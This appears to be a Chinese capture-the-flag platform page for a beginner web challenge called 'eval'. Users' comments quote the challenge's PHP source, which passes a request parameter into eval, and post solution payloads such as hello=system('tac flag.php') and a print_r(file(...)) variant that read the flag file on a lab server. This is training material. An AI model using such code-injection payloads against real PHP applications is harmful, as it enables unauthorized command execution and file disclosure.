evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 14977
提  示:
描  述:
eval
评论
Hacker23 3年前

http://114.67.246.176:10183/?hello=system('tac flag.php')

回复 12
ZTyyds 2年前

原理是什么啊???想了解一下

回复 0

guoguo 3年前

题目内容:<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 可以使用hello=system('tac flag.php')或者?hello=10/print_r(file("flag.ph

回复 3
dsadscxzewq 3年前

为啥用cat不行呢?

回复 0

痕夕 3年前

看不懂,求解,大佬

回复 6

SwBack 3年前

大道至简,直接当作一句话利用即可 hello=system('tac flag.php')

回复 5
巨人肩膀上的矮子 3年前

@dsadscxzewq cat是可以的,只不过在源代码里查看

回复 0

dsadscxzewq 3年前

为啥用cat不行呢?

回复 1

BBBugku 3年前

F12查看源代码,且根据题目描述可以得知flag在flag.php文件中,且在源代码中发现hello并未赋值,因此只需在原有的url后添加 /?hello=10/print_r(file("flag.php")) ,刷新网页,找到flag。

回复 14
krystalll 3年前

感谢

回复 3

lurnco 3年前

Too young Too simple

回复 3

Discuze奇 3年前

我的金币不太允许了呀。。。

回复 1
lurnco 3年前

可以创个小号做后面的题人?

回复 0

1amer 3年前

直接读文件吧

回复 0

你听说过呆呆吗? 3年前

只有我一个人知道bugku更新了吗

回复 0
storn 3年前

我也是刚发现,而且,我原来的号好像没了,o(╥﹏╥)o

回复 0

WriteUp

image
harry

1 金币

评分(9)

解题动态

16671766779 攻破了该题 5小时前
MonkeZ 攻破了该题 5小时前
13787026747 攻破了该题 5小时前
155598805811 攻破了该题 5小时前
5326 攻破了该题 5小时前
18469110745 攻破了该题 5小时前
迷茫的三千面 攻破了该题 6小时前
locust 攻破了该题 6小时前
cbcgqz 攻破了该题 12小时前
1431468079 攻破了该题 13小时前
冯新迪F 攻破了该题 13小时前
Authy425 攻破了该题 14小时前
2483632015 攻破了该题 18小时前
老鸭 攻破了该题 1天前
a234567 攻破了该题 1天前
550410825 攻破了该题 1天前
18305561253 攻破了该题 1天前
2845985939 攻破了该题 1天前
Arche 攻破了该题 1天前
Fran 攻破了该题 1天前
问题反馈